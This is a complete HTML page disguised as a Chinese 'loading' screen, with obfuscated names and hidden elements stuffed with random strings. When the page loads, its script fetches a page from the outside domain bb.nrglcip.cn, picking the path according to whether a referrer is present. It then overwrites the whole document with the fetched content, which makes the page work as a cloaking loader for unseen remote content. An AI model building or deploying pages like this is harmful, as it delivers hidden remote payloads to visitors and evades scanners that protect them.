<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NIYwl3Io {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NIYwl3Io .UKNHEtW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NIYwl3Io .content {
            line-height: 50px;
            text-align: center
        }

        .NIYwl3Io .img {
            width: 100%
        }

        .NIYwl3Io .h6KEMS {
            text-align: center
        }

        .NIYwl3Io .h6KEMS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NIYwl3Io .h6KEMS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NIYwl3Io .h6KEMS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NIYwl3Io .h6KEMS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NIYwl3Io .h6KEMS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NIYwl3Io .h6KEMS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NIYwl3Io .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nETuMZVvAPF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wgJvXFm = nETuMZVvAPF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wgJvXFm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wgJvXFm +".html?a=share";
		}
		
        tVxC9HK9=url+"#"+new Date().getTime();
        tVxC9HK9 && function() {
            $.get(tVxC9HK9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Q4HXEyPpxRCpA6JpvSS9B4iRm7BYFjq2DnVhO7TAW9wulNBzOStmWRZvMrPCDgWGicyWuzsQ</b>
<h1 style='display:none' >kKPcmbGRxwLt6nfAVyVblA3vAAQjgVZII5ifeXaCTb5Bvz4siuIKIyZV5xS7z8JBn</h1>
<a  href='#' style='display:none'>EDfm5x8PNPoVef5dRmv63Af5zbZoVuA6T7kS4hL3hp7Gngj2Lbs6Rc96i7culR3uG8nrPqvQ</a>
<h1 style='display:none' >kKPcmbGRxwLt6nfAVyVblA3vAAQjgVZII5ifeXaCTb5Bvz4siuIKIyZV5xS7z8JBn</h1>
<p  style='display:none'>wc3ejshvecYcYAraZJgQ</p>
<img  src='' style='display:none'>
<ul style='display:none' >sgz9hjB5F6uWCaN5c7jr9AlyBWUSmS6ihqjq5cHb</ul>
<div style='display:none'>Rsv8117GlxLe3nlZKCw4uphri78HlWltNCU7DgjRJJvHdTXJVXin5ub1VlNB12tIC2LOn0kyFYOyMBRQl1vp1CMAWFOpbRbpj44b</div>
<li style='display:none' >xL3y2XAcGdEtOCjG</li><div class="NIYwl3Io">
    <div class="UKNHEtW">
        <div class="h6KEMS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >KIqBrNFvc8J0t2HkdRTJIvehzENIe9INGJQoRRu1mWJ0HL</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>tqb25sgtb5fU6kaHO5ZZFYHZHDgQdLnHlogG9KyFChdoWqKVGPxDFyVRUWesFufEK52lT9UblACyzJJgbDgW9h1WZpN</a>
<a  href='#' style='display:none'>tqb25sgtb5fU6kaHO5ZZFYHZHDgQdLnHlogG9KyFChdoWqKVGPxDFyVRUWesFufEK52lT9UblACyzJJgbDgW9h1WZpN</a>
<span style='display:none'>epS9xviTrVGGDAQIcmcAHepzO</span>
<b style='display:none' >KIqBrNFvc8J0t2HkdRTJIvehzENIe9INGJQoRRu1mWJ0HL</b></body>
</html>